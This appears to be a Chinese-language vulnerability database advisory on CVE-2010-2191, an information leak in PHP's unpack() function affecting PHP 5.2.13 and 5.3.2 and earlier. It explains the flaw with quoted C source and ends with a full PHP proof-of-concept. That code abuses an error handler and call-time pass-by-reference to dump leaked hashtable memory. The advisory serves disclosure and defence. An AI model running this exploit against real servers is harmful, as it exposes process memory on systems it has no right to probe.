Lucene search
K
Database
Vendors
Products
Years
CVSS
Scanner
Agent Scanning
API Scanning
Manual Audit
Perimeter Scanner
Scanning
Projects
Email
Webhook
Plugins
Resources
Documents
Blog
Glossary
FAQ
Pricing
Contacts
About Us
Partners
Branding Guideline
seebugRootSSV:19879
HistoryJun 28, 2010 - 12:00 a.m.

PHP unpack()函数中断处理信息泄露漏洞

2010-06-2800:00:00
Root
www.seebug.org
13

0.006 Low

EPSS

Percentile

75.2%

JSON

CVE ID: CVE-2010-2191

PHP是广泛使用的通用目的脚本语言,特别适合于Web开发,可嵌入到HTML中。

PHP的unpack()函数中存在信息泄露漏洞:

{
char *format, *input, *formatarg, *inputarg;
int formatlen, formatarg_len, inputarg_len;
int inputpos, inputlen, i;

if (zend_parse_parameters(ZEND_NUM_ARGS() TSRMLS_CC, "ss", &formatarg, &formatarg_len,
    &inputarg, &inputarg_len) == FAILURE) {
    return;
}

format = formatarg;
formatlen = formatarg_len;
input = inputarg;

该函数开始时将两个用户所提供参数读取到了本地变量,然后解析所提供的格式串。由于call time pass by reference功能,函数中间的中断允许使用其他变量类型替换输入字符串,导致泄漏哈希表内容。可通过提供无效的定位命令来触发中断。

case ‘@’:
if (arg <= inputlen) {
inputpos = arg;
} else {
php_error_docref(NULL TSRMLS_CC, E_WARNING, "Type %c: outside of string", type);
}

i = arg - 1;    /* Done, break out of for loop */
break;

错误处理器可以更改第二个参数的内容。

PHP PHP <= 5.3.2
PHP PHP <= 5.2.13
厂商补丁:

PHP

目前厂商还没有提供补丁或者升级程序,我们建议使用此软件的用户随时关注厂商的主页以获取最新版本:

http://www.php.net


                                                &lt;?php
function my_error()
{
    parse_str(&quot;xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx=1&quot;, $GLOBALS['var']);
    return 1;
}

/* Detect 32 vs 64 bit */
$i = 0x7fffffff;
$i++;
if (is_float($i)) {
    $l = 39;        
} else {
    $l = 67;
}
$GLOBALS['var'] = str_repeat(&quot;A&quot;, $l);

/* Trigger the Code */
set_error_handler(&quot;my_error&quot;);
$x = unpack(&quot;@31337/@0/A$l&quot;, &amp;$GLOBALS['var']);
restore_error_handler();
hexdump($x[1]);

/* Helper function */
function hexdump($x)
{
    $l = strlen($x);
    $p = 0;

    echo &quot;Hexdump\n&quot;;
    echo &quot;-------\n&quot;;

    while ($l &gt; 16) {
        echo sprintf(&quot;%08x: &quot;,$p);
        for ($i=0; $i&lt;16; $i++) {
            echo sprintf(&quot;%02X &quot;, ord($x[$p+$i]));
        }
        echo &quot;  &quot;;
        for ($i=0; $i&lt;16; $i++) {
            $c = ord($x[$p+$i]);
            echo ($c &lt; 32 || $c &gt; 127) ? '.' : chr($c);
        }
        $l-=16;
        $p+=16;
        echo &quot;\n&quot;;
    }
    if ($l &gt; 0)
    echo sprintf(&quot;%08x: &quot;,$p);
    for ($i=0; $i&lt;$l; $i++) {
        echo sprintf(&quot;%02X &quot;, ord($x[$p+$i]));
    }
    for ($i=0; $i&lt;16-$l; $i++) { echo &quot;-- &quot;; }

    echo &quot;  &quot;;
    for ($i=0; $i&lt;$l; $i++) {
        $c = ord($x[$p+$i]);
        echo ($c &lt; 32 || $c &gt; 127) ? '.' : chr($c);
    }
    echo &quot;\n&quot;;
}
?&gt;

Related

prion 1
seebug 1
cve 1
ubuntucve 1
openvas 7
nessus 8
securityvulns 1
gentoo 1
prion
prion
Memory corruption
2010-06-08 00:30:00
seebug
seebug
PHP pack()函数中断处理信息泄露漏洞
2010-06-28 00:00:00
cve
cve
CVE-2010-2191
2010-06-08 00:30:00
ubuntucve
ubuntucve
CVE-2010-2191
2010-06-08 00:00:00
openvas
openvas
PHP Multiple Information Disclosure Vulnerabilities
2010-06-15 00:00:00
PHP < 5.2.14 Multiple Vulnerabilities
2012-06-21 00:00:00
PHP < 5.2.14 Multiple Vulnerabilities
2020-08-17 00:00:00
nessus
nessus
PHP 5.2 < 5.2.14 Multiple Vulnerabilities
2010-08-04 00:00:00
PHP 5.3 < 5.3.3 Multiple Vulnerabilities
2010-08-04 00:00:00
SuSE 10 Security Update : Linux kernel (ZYPP Patch Number 7110)
2010-10-11 00:00:00
securityvulns
securityvulns
[ GLSA 201110-06 ] PHP: Multiple vulnerabilities
2011-10-12 00:00:00
gentoo
gentoo
PHP: Multiple vulnerabilities
2011-10-10 00:00:00

0.006 Low

EPSS

Percentile

75.2%

JSON
Related for SSV:19879
prion1seebug1cve1ubuntucve1openvas7nessus8securityvulns1gentoo1